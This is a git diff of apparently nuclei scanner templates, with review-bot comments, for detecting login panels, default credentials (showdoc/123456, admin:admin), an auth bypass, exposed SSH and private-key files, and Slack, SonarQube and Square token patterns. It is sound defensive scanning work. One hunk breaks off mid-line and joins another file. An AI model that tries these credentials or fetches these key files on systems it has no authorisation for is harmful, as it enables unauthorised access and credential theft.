+1,5 @@ id: showdoc-default-login + info: name: Showdoc Default Login author: pikpikcu @@ -6,13 +7,15 @@ info: description: Showdoc default credentials were discovered. reference: - https://blog.star7th.com/2016/05/2007.html - tags: showdoc,default-login classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 - cve-id: cwe-id: CWE-522 -requests: + metadata: + max-request: 1 + tags: showdoc,default-login + +http: - raw: - | POST /server/index.php?s=/api/user/login HTTP/1.1 
@@ -20,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded;charset=UTF-8 username={{username}}&password={{password}}&v_code= + payloads: username: - showdoc password: - 123456 attack: pitchfork + matchers-condition: and matchers: - type: word @@ -33,8 +38,9 @@ requests: - '"username":"showdoc"' - '"user_token":' condition: and + - type: status status: - 200 -# Enhanced by mp on 2022/03/11 +# digest: 4a0a00473045022035dad9ddfbf0e6fb91a80fca9878b313092374a601129f7792f172131a26c99d022100febc0eab2e695a86e0b0af34718b652daa0913d81e3516918c8a249e1bebffcc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sitefinity-login-10298.yaml b/poc/auth/sitefinity-login-10297.yaml similarity index 100% rename from poc/auth/sitefinity-login-10298.yaml rename to poc/auth/sitefinity-login-10297.yaml diff --git a/poc/auth/sitefinity-login.yaml b/poc/auth/sitefinity-login.yaml index 0d146256b9..441e824eda 100644 --- a/poc/auth/sitefinity-login.yaml +++ b/poc/auth/sitefinity-login.yaml @@ -1,4 +1,5 @@ id: sitefinity-login + info: name: Sitefinity Login author: dhiyaneshDK @@ -6,18 +7,23 @@ info: description: This template identifies the Sitefinity login page. reference: - https://www.exploit-db.com/ghdb/6722 - tags: panel,sitefinity -requests: + metadata: + max-request: 1 + tags: sitefinity,edb,panel + +http: - method: GET path: - '{{BaseURL}}/Sitefinity/Authenticate/SWT' + matchers-condition: and matchers: - type: word words: - 'Telerik.Sitefinity.Web.UI.UserPreferences' + - type: status status: - 200 -# Enhanced by cs on 2022/02/28 +# digest: 4b0a00483046022100abaac7dde301e7bfbf2c555fdc011dac48f4f07f3f1f9b47bf5353203bd09ad9022100bb9a0ca31438b251f1241420c8c01590ae7fd0dd1fd66a4582aaf834dff972d2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/siteomat-login-10300.yaml b/poc/auth/siteomat-login-10300.yaml deleted file mode 100644 index e24172c9a5..0000000000 --- a/poc/auth/siteomat-login-10300.yaml +++ /dev/null 
@@ -1,19 +0,0 @@ -id: siteomat-loader -info: - name: Orpak SiteOmat login portals - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6624 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login.htm' - matchers-condition: and - matchers: - - type: word - words: - - 'SiteOmat Login' - - type: status - status: - - 200 diff --git a/poc/auth/siteomat-login-10301.yaml b/poc/auth/siteomat-login-10301.yaml new file mode 100644 index 0000000000..20854f2b8d --- /dev/null +++ b/poc/auth/siteomat-login-10301.yaml @@ -0,0 +1,19 @@ +id: siteomat-loader +info: + name: Orpak SiteOmat login portals + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6624 + tags: panel,siteomat,login +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + matchers-condition: and + matchers: + - type: word + words: + - 'SiteOmat Login' + - type: status + status: + - 200 diff --git a/poc/auth/siteomat-login-10303.yaml b/poc/auth/siteomat-login-10303.yaml index 20854f2b8d..de5e63a8ba 100644 --- a/poc/auth/siteomat-login-10303.yaml +++ b/poc/auth/siteomat-login-10303.yaml @@ -3,7 +3,8 @@ info: name: Orpak SiteOmat login portals author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6624 + reference: + - https://www.exploit-db.com/ghdb/6624 tags: panel,siteomat,login requests: - method: GET diff --git a/poc/auth/slack-bot-token-10310.yaml b/poc/auth/slack-bot-token-10310.yaml index e520d806c8..8e76c2814d 100644 --- a/poc/auth/slack-bot-token-10310.yaml +++ b/poc/auth/slack-bot-token-10310.yaml @@ -1,18 +1,15 @@ id: slack-bot-token - info: name: Slack access token author: nadino severity: info tags: exposure,token,slack - requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file + - "xoxb-[0-9A-Za-z\\-]{51}" 
diff --git a/poc/auth/slack-bot-token-10312.yaml b/poc/auth/slack-bot-token-10312.yaml new file mode 100644 index 0000000000..e520d806c8 --- /dev/null +++ b/poc/auth/slack-bot-token-10312.yaml @@ -0,0 +1,18 @@ +id: slack-bot-token + +info: + name: Slack access token + author: nadino + severity: info + tags: exposure,token,slack + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file diff --git a/poc/auth/slocum-login-10317.yaml b/poc/auth/slocum-login-10317.yaml index b5ffdacd1e..118932715d 100644 --- a/poc/auth/slocum-login-10317.yaml +++ b/poc/auth/slocum-login-10317.yaml @@ -1,18 +1,22 @@ id: slocum-login + info: name: Slocum Fleet Mission Control Login author: pussycat0x severity: info tags: panel,tech,slocum + requests: - method: GET path: - "{{BaseURL}}/sfmc/login" + matchers-condition: and matchers: - type: word words: - "Slocum Fleet Mission Control - Login" + - type: status status: - 200 diff --git a/poc/auth/slocum-login.yaml b/poc/auth/slocum-login.yaml index 108ce5cc24..b5ffdacd1e 100644 --- a/poc/auth/slocum-login.yaml +++ b/poc/auth/slocum-login.yaml @@ -1,31 +1,18 @@ id: slocum-login - info: - name: Slocum Fleet Mission Control Login Panel - Detect + name: Slocum Fleet Mission Control Login author: pussycat0x severity: info - description: Slocum Fleet Mission Control login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 tags: panel,tech,slocum - -http: +requests: - method: GET path: - "{{BaseURL}}/sfmc/login" - matchers-condition: and matchers: - type: word words: - "Slocum Fleet Mission Control - Login" - - type: status status: - 200 - -# digest: 4a0a00473045022100d4e6d5f058359a5d8b637a79a5ac3fba6066e07f6971c60ed482705b22cdb0fb02203cfc99e10ca906964c7533d1d0aaec6982103e16e14207147c2ab5a159d07010:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/auth/smartsense-default-login-10330.yaml b/poc/auth/smartsense-default-login-10330.yaml index b4af83b266..accfe10352 100644 --- a/poc/auth/smartsense-default-login-10330.yaml +++ b/poc/auth/smartsense-default-login-10330.yaml @@ -1,4 +1,5 @@ id: smartsense-default-login + info: name: HortonWorks SmartSense Default Login author: Techryptic (@Tech) @@ -10,30 +11,37 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 1 tags: hortonworks,smartsense,default-login -requests: + +http: - raw: - | GET /apt/v1/context HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: word words: - "Set-Cookie: SUPPORTSESSIONID" part: header + - type: word words: - "smartsenseId" + - type: status status: - 200 -# Enhanced by mp on 2022/03/10 +# digest: 4a0a004730450221008b7310d0ce26ecd9fffe8991ba01f96ae300acf8002c75a28347f40c94ed5a6802202e17996a4e4e1483ed8f58408f3a8b448c315aa8c380d084c0f6c88fbbb22b64:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/smartsense-default-login-10331.yaml b/poc/auth/smartsense-default-login-10331.yaml index 88bc61e7b6..e6c7dc5e8c 100644 --- a/poc/auth/smartsense-default-login-10331.yaml +++ b/poc/auth/smartsense-default-login-10331.yaml @@ -3,14 +3,9 @@ info: name: HortonWorks SmartSense Default Login author: Techryptic (@Tech) severity: high - description: HortonWorks SmartSense default admin login information was detected. + description: Default Login of admin:admin on HortonWorks SmartSense application. reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html tags: hortonworks,smartsense,default-login - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 requests: - raw: - | 
@@ -35,5 +30,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/solar-log-authbypass-10352.yaml b/poc/auth/solar-log-authbypass-10352.yaml deleted file mode 100644 index 6b4d906250..0000000000 --- a/poc/auth/solar-log-authbypass-10352.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: solar-log-authbypass - -info: - name: Solar-Log 500 2.8.2 - Incorrect Access Control - author: geeknik - severity: high - description: Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server. - reference: - - https://www.exploit-db.com/exploits/49986 - classification: - cwe-id: CWE-284 - metadata: - max-request: 1 - tags: solarlog,auth-bypass,edb - -http: - - method: GET - path: - - "{{BaseURL}}/lan.html" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "IPC@CHIP" - - - type: word - part: body - words: - - " Solare Datensysteme GmbH" - - "mailto:info@solar-log.com" - condition: and - -# digest: 4a0a00473045022100befc1d4bf898609aed2567951ef9d96923407a7ac74979b6969d38b7e0d2295702200e9232cb6c80aebd34b60aa9dc6af19437484593d9a84e0af8b06fbd584053d4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/solar-log-authbypass.yaml b/poc/auth/solar-log-authbypass.yaml new file mode 100644 index 0000000000..9e66b4dc51 --- /dev/null +++ b/poc/auth/solar-log-authbypass.yaml 
@@ -0,0 +1,27 @@ +id: solar-log-authbypass +info: + name: Solar-Log 500 2.8.2 - Incorrect Access Control + author: geeknik + severity: high + description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server + reference: https://www.exploit-db.com/exploits/49986 + tags: solarlog,auth-bypass +requests: + - method: GET + path: + - "{{BaseURL}}/lan.html" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - "IPC@CHIP" + - type: word + part: body + words: + - " Solare Datensysteme GmbH" + - "mailto:info@solar-log.com" + condition: and diff --git a/poc/auth/solarwinds-default-login-10355.yaml b/poc/auth/solarwinds-default-login-10355.yaml deleted file mode 100644 index ea489ae260..0000000000 --- a/poc/auth/solarwinds-default-login-10355.yaml +++ /dev/null 
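Review bot: All three matchers in the new solar-log-authbypass.yaml key on vendor branding (`IPC@CHIP` in the header, `Solare Datensysteme GmbH` and the `mailto:` address in the body) plus a 200 on `/lan.html`. The `severity: high` result therefore assumes that a fixed build never returns a branded 200 page on that path. Nothing checks the firmware build named in the description or content specific to the settings page, so a hit needs manual confirmation before it is triaged as high. I would add a comment above `matchers:` such as `# Fingerprint only: does not verify the firmware build from the description`, and restore the `classification:` block with `cwe-id: CWE-284` and the `metadata:` block with `max-request: 1` that the deleted -10352 copy carried.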
@@ -1,47 +0,0 @@ -id: solarwinds-default-admin -info: - name: SolarWinds Orion Default Login - author: dwisiswant0 - severity: high - description: SolarWinds Orion default admin credentials were discovered. - reference: - - https://github.com/solarwinds/OrionSDK/wiki/REST - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: solarwinds,default-login -# Optional: -# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 -# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} -requests: - - raw: - - | - GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username)}} - - | - GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username)}} - payloads: - username: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - "Content-Type: application/json" - part: header - - type: regex - regex: - - "(totalRow|result|swi)s(:\\/\\/)?" - - "(Orion\\.|Poller(ID)?)s?" - condition: and - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/solarwinds-default-login-10356.yaml b/poc/auth/solarwinds-default-login-10356.yaml index 94fa5c0a3c..ea489ae260 100644 --- a/poc/auth/solarwinds-default-login-10356.yaml +++ b/poc/auth/solarwinds-default-login-10356.yaml 
@@ -3,11 +3,17 @@ info: name: SolarWinds Orion Default Login author: dwisiswant0 severity: high + description: SolarWinds Orion default admin credentials were discovered. + reference: + - https://github.com/solarwinds/OrionSDK/wiki/REST + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: solarwinds,default-login - reference: https://github.com/solarwinds/OrionSDK/wiki/REST - # Optional: - # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 - # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} +# Optional: +# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 +# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} requests: - raw: - | @@ -37,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/somfy-login-10371.yaml b/poc/auth/somfy-login-10371.yaml new file mode 100644 index 0000000000..2a3d4c40d1 --- /dev/null +++ b/poc/auth/somfy-login-10371.yaml @@ -0,0 +1,18 @@ +id: somfy-login +info: + name: Somfy Login Page + author: DhiyaneshDK + severity: info + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/m_login.htm' + matchers-condition: and + matchers: + - type: word + words: + - Home motion by Somfy + - type: status + status: + - 200 diff --git a/poc/auth/somfy-login-10373.yaml b/poc/auth/somfy-login-10373.yaml deleted file mode 100644 index 4a22eded46..0000000000 --- a/poc/auth/somfy-login-10373.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: somfy-login -info: - name: Somfy Login Page - author: DhiyaneshDK - severity: info - tags: panel,login -requests: - - method: GET - path: - - '{{BaseURL}}/m_login.htm' - matchers-condition: and - matchers: - - type: word - words: - - Home motion by Somfy - - type: status - status: - - 200 
diff --git a/poc/auth/sonarqube-token-10380.yaml b/poc/auth/sonarqube-token-10380.yaml deleted file mode 100644 index ceac80589a..0000000000 --- a/poc/auth/sonarqube-token-10380.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: sonarqube-token -info: - name: SonarQube Token Disclosure - author: Ice3man - severity: info - tags: exposure,token -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" diff --git a/poc/auth/sonarqube-token-10382.yaml b/poc/auth/sonarqube-token-10382.yaml index 994d036f12..7fe08cc8f9 100644 --- a/poc/auth/sonarqube-token-10382.yaml +++ b/poc/auth/sonarqube-token-10382.yaml @@ -1,22 +1,15 @@ id: sonarqube-token - info: name: SonarQube Token Disclosure author: Ice3man severity: info - metadata: - max-request: 1 tags: exposure,token,sonarqube - -http: +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" - -# digest: 4a0a0047304502204b7b6bb1ff958d322155673133a99b081ed1c61bd8afb5e1d0f249849b9badc6022100efbd2cb1fd9179a7c9a30daac8033d293490f30b28af36dadb2107ddd9d6e604:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/spark-webui-unauth-10401.yaml b/poc/auth/spark-webui-unauth-10401.yaml new file mode 100644 index 0000000000..6ca1120cb0 --- /dev/null +++ b/poc/auth/spark-webui-unauth-10401.yaml @@ -0,0 +1,26 @@ +id: spark-webui-unauth + +info: + name: Unauthenticated Spark WebUI + author: princechaddha + severity: medium + reference: + - https://github.com/vulhub/vulhub/tree/master/spark/unacc + tags: spark,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Spark Master at spark://" + - "<strong>URL:</strong>" + part: body + condition: and 
diff --git a/poc/auth/spark-webui-unauth.yaml b/poc/auth/spark-webui-unauth.yaml index 31a45c9631..a917ae6951 100644 --- a/poc/auth/spark-webui-unauth.yaml +++ b/poc/auth/spark-webui-unauth.yaml @@ -1,31 +1,22 @@ id: spark-webui-unauth - info: name: Unauthenticated Spark WebUI author: princechaddha severity: medium - reference: - - https://github.com/vulhub/vulhub/tree/master/spark/unacc - metadata: - max-request: 1 - tags: unauth,vulhub,spark - -http: + reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc + tags: spark,unauth +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "<title>Spark Master at spark://" - "<strong>URL:</strong>" part: body condition: and - -# digest: 4a0a004730450220270869b1b7fd1729ea28140dbf8a434ca5b2b341dd040852601e1b37cd1e8499022100942b17a3cf90e2d877e8ffed244ff81baa455305d50bfbf4e5c9f90ad08771e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sphider-login-10407.yaml b/poc/auth/sphider-login-10407.yaml deleted file mode 100644 index f9ac4a5606..0000000000 --- a/poc/auth/sphider-login-10407.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: sphider-login -info: - name: Sphider Admin Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6641 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/admin/spider.php' - - '{{BaseURL}}/sphider/admin/admin.php' - - '{{BaseURL}}/search/admin/admin.php' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - '<title>Sphider Admin Login' - - type: status - status: - - 200 diff --git a/poc/auth/sphider-login-10408.yaml b/poc/auth/sphider-login-10408.yaml index 59e7e8b72e..becae53fbd 100644 --- a/poc/auth/sphider-login-10408.yaml +++ b/poc/auth/sphider-login-10408.yaml 
@@ -3,7 +3,8 @@ info: name: Sphider Admin Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6641 + reference: + - https://www.exploit-db.com/ghdb/6641 tags: panel requests: - method: GET @@ -11,6 +12,7 @@ requests: - '{{BaseURL}}/admin/spider.php' - '{{BaseURL}}/sphider/admin/admin.php' - '{{BaseURL}}/search/admin/admin.php' + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/poc/auth/sphider-login-10409.yaml b/poc/auth/sphider-login-10409.yaml new file mode 100644 index 0000000000..59e7e8b72e --- /dev/null +++ b/poc/auth/sphider-login-10409.yaml @@ -0,0 +1,21 @@ +id: sphider-login +info: + name: Sphider Admin Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6641 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/admin/spider.php' + - '{{BaseURL}}/sphider/admin/admin.php' + - '{{BaseURL}}/search/admin/admin.php' + matchers-condition: and + matchers: + - type: word + words: + - 'Sphider Admin Login' + - type: status + status: + - 200 diff --git a/poc/auth/sphider-login.yaml b/poc/auth/sphider-login.yaml index 4745def5b6..f9ac4a5606 100644 --- a/poc/auth/sphider-login.yaml +++ b/poc/auth/sphider-login.yaml 
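Review bot: The new sphider-login-10409.yaml lists three candidate admin paths but omits `stop-at-first-match: true`, which the -10408 hunk earlier on this line adds. The sphider-login.yaml hunk that follows removes the same setting. Without it, every path is requested on each target and one installation can be reported more than once. I would add `stop-at-first-match: true` after the `path:` list in both files so the copies sharing `id: sphider-login` behave the same.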
@@ -1,37 +1,22 @@ id: sphider-login - info: - name: Sphider Admin Login Panel - Detect + name: Sphider Admin Login author: dhiyaneshDK severity: info - description: Sphider admin login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6641 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 3 - tags: edb,panel - -http: + reference: https://www.exploit-db.com/ghdb/6641 + tags: panel +requests: - method: GET path: - '{{BaseURL}}/admin/spider.php' - '{{BaseURL}}/sphider/admin/admin.php' - '{{BaseURL}}/search/admin/admin.php' - stop-at-first-match: true - matchers-condition: and matchers: - type: word words: - 'Sphider Admin Login' - - type: status status: - 200 - -# digest: 4a0a004730450220189d990c7ed8618187a0925397f404775be07d3ca9d4d2be91643fdf0321a6d6022100c42cb786ca05f7be0ce6361bdb70299b93507de5f713637a2cae52fc639779ca:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/splunk-enterprise-login-panel.yaml b/poc/auth/splunk-enterprise-login-panel.yaml index 49a90394ee..af5162d861 100644 --- a/poc/auth/splunk-enterprise-login-panel.yaml +++ b/poc/auth/splunk-enterprise-login-panel.yaml @@ -1,31 +1,22 @@ id: splunk-enterprise-panel + info: - name: Splunk Enterprise Panel Detect + name: Splunk Enterprise Panel author: praetorian-thendrickson severity: info - reference: - - https://www.splunk.com/en_us/software/splunk-enterprise.html - metadata: - shodan-query: http.title:"Login - Splunk" + reference: https://www.shodan.io/search?query=title%3A%22Login+Splunk%22 tags: panel,splunk + requests: - method: GET path: - '{{BaseURL}}/en-US/account/login' redirects: true + matchers-condition: and matchers: - type: word words: - 'Splunk Inc.' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '"version": "(.*)"' - - 'versionNumber": "([0-9.]+)"' - - '"VERSION_LABEL": "([0-9.]+)"' + - 'splunkd' + - 'Splunk Enterprise' 
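Review bot: With the status matcher removed, the only matcher left in splunk-enterprise-login-panel.yaml is a word list with no `condition`, and nuclei treats such a list as `or`, so any page that contains just `Splunk Inc.` after redirects are followed is reported as the Enterprise panel. `matchers-condition: and` then has nothing left to combine. Add `condition: and` and `part: body` under the word matcher, or restore the `- type: status` check with `- 200`. The version extractors removed here were also the only output that told a defender which release was found.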
diff --git a/poc/auth/splunk-enterprise-login-panel.yml b/poc/auth/splunk-enterprise-login-panel.yml deleted file mode 100644 index af5162d861..0000000000 --- a/poc/auth/splunk-enterprise-login-panel.yml +++ /dev/null @@ -1,22 +0,0 @@ -id: splunk-enterprise-panel - -info: - name: Splunk Enterprise Panel - author: praetorian-thendrickson - severity: info - reference: https://www.shodan.io/search?query=title%3A%22Login+Splunk%22 - tags: panel,splunk - -requests: - - method: GET - path: - - '{{BaseURL}}/en-US/account/login' - redirects: true - - matchers-condition: and - matchers: - - type: word - words: - - 'Splunk Inc.' - - 'splunkd' - - 'Splunk Enterprise' diff --git a/poc/auth/splunk-login-10416.yaml b/poc/auth/splunk-login-10416.yaml new file mode 100644 index 0000000000..ccfbcaee47 --- /dev/null +++ b/poc/auth/splunk-login-10416.yaml @@ -0,0 +1,24 @@ +id: splunk-login + +info: + name: Splunk SOAR + author: dhiyaneshDK + severity: info + metadata: + shodan-query: http.title:"Splunk SOAR" + tags: panel,splunk + +requests: + - method: GET + path: + - '{{BaseURL}}/login?next=/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Splunk SOAR' + + - type: status + status: + - 200 diff --git a/poc/auth/square-access-token(1).yaml b/poc/auth/square-access-token(1).yaml deleted file mode 100644 index 5601c992e7..0000000000 --- a/poc/auth/square-access-token(1).yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: square-access-token - -info: - name: Square Access Token - author: gaurang,daffainfo - severity: high - tags: token,file,square - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "EAAAE[a-zA-Z0-9_-]{59}" - - "sq0atp-[0-9A-Za-z\\-_]{22}" diff --git a/poc/auth/square-access-token-11867.yaml b/poc/auth/square-access-token-11867.yaml new file mode 100644 index 0000000000..e0a5d2d1d0 --- /dev/null +++ b/poc/auth/square-access-token-11867.yaml 
@@ -0,0 +1,14 @@ +id: square-access-token +info: + name: Square Access Token + author: gaurang,daffainfo + severity: high + tags: token,file,square +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "EAAAE[a-zA-Z0-9_-]{59}" + - "sq0atp-[0-9A-Za-z\\-_]{22}" diff --git a/poc/auth/square-access-token.yaml b/poc/auth/square-access-token.yaml index e0a5d2d1d0..5601c992e7 100644 --- a/poc/auth/square-access-token.yaml +++ b/poc/auth/square-access-token.yaml @@ -1,12 +1,15 @@ id: square-access-token + info: name: Square Access Token author: gaurang,daffainfo severity: high tags: token,file,square + file: - extensions: - all + extractors: - type: regex regex: diff --git a/poc/auth/ssh-authorized-keys-10523.yaml b/poc/auth/ssh-authorized-keys-10523.yaml index 8cadf9c3e6..3ae41746b1 100644 --- a/poc/auth/ssh-authorized-keys-10523.yaml +++ b/poc/auth/ssh-authorized-keys-10523.yaml @@ -1,15 +1,26 @@ id: ssh-authorized-keys + info: - name: SSH Authorized Keys + name: SSH Authorized Keys File - Detect author: geeknik - reference: https://www.ssh.com/academy/ssh/authorized-key - severity: low + severity: medium + description: SSH authorized keys file was detected. + reference: + - https://www.ssh.com/academy/ssh/authorized-key + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 2 tags: config,exposure,ssh -requests: + +http: - method: GET path: - "{{BaseURL}}/.ssh/authorized_keys" - "{{BaseURL}}/_/.ssh/authorized_keys" + matchers-condition: and matchers: - type: word @@ -19,6 +30,9 @@ requests: - "ssh-rsa" - "ecdsa-sha2-nistp256" condition: or + - type: status status: - 200 + +# digest: 4b0a00483046022100ef061bf288841527c39730c3a04580cbcbe3c87e6037aaea3a4d70395670f44902210081cd1eea8fb47d9d7f0c76354181e3682b607af69b9cda401e1081704366c31c:922c64590222798bb761d5b6d8e72950 
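Review bot: The word matcher of ssh-authorized-keys-10523.yaml shows `ssh-rsa` and `ecdsa-sha2-nistp256` under `condition: or` in the second hunk; unless a line outside the hunk covers it, an exposed file that holds only `ssh-ed25519` keys is missed. Adding `- "ssh-ed25519"` to the list closes that gap. Since the commit raises `severity` to medium, note also that any 200 response mentioning one of these strings matches, so a negative matcher on HTML markup would cut false positives. The word list begins above the second hunk.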
diff --git a/poc/auth/stem-audio-table-private-keys-10535.yaml b/poc/auth/stem-audio-table-private-keys-10535.yaml new file mode 100644 index 0000000000..ffef41a49a --- /dev/null +++ b/poc/auth/stem-audio-table-private-keys-10535.yaml @@ -0,0 +1,22 @@ +id: stem-audio-table-private-keys +info: + name: Detect Private Key on STEM Audio Table + author: gy741 + severity: high + reference: https://blog.grimm-co.com/2021/06/the-walls-have-ears.html + tags: stem,config,exposure,iot +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/privatekey.pem" + matchers-condition: and + matchers: + - type: word + words: + - "BEGIN RSA PRIVATE KEY" + - type: status + status: + - 200 + - type: dsl + dsl: + - '!contains(tolower(body), "' + matchers-condition: and matchers: - type: word @@ -42,10 +48,12 @@ requests: - 'Redirecting...' - '

Redirecting...' + - type: word part: header words: - 'session' + - type: status status: - 302 diff --git a/poc/auth/symantec-dlp-login-10596.yaml b/poc/auth/symantec-dlp-login-10596.yaml deleted file mode 100644 index 688e47b4ab..0000000000 --- a/poc/auth/symantec-dlp-login-10596.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: symantec-dlp-login -info: - name: Symantec Data Loss Prevention - author: princechaddha - severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Symantec+Data+Loss+Prevention%22 - tags: symantec,panel,login -requests: - - method: GET - path: - - '{{BaseURL}}/ProtectManager/Logon' - matchers-condition: and - matchers: - - type: word - words: - - "Symantec Data Loss Prevention" - part: body - - type: status - status: - - 200 diff --git a/poc/auth/symantec-epm-login-10601.yaml b/poc/auth/symantec-epm-login-10599.yaml similarity index 100% rename from poc/auth/symantec-epm-login-10601.yaml rename to poc/auth/symantec-epm-login-10599.yaml diff --git a/poc/auth/symantec-ewep-login-10605.yaml b/poc/auth/symantec-ewep-login-10605.yaml index ba70fd514b..2427730b89 100644 --- a/poc/auth/symantec-ewep-login-10605.yaml +++ b/poc/auth/symantec-ewep-login-10605.yaml @@ -1,25 +1,20 @@ id: symantec-ewep-login - info: name: Symantec Encryption Web Email Protection author: johnk3r severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 tags: panel,symantec,login - requests: - method: GET path: - "{{BaseURL}}/b/l.e" - matchers-condition: and matchers: - type: word words: - "Symantec Encryption Server: Web Email Protection - Login" part: body - - type: status status: - 200 diff --git a/poc/auth/symantec-ewep-login-10606.yaml b/poc/auth/symantec-ewep-login-10606.yaml index 2427730b89..835a5f9663 100644 
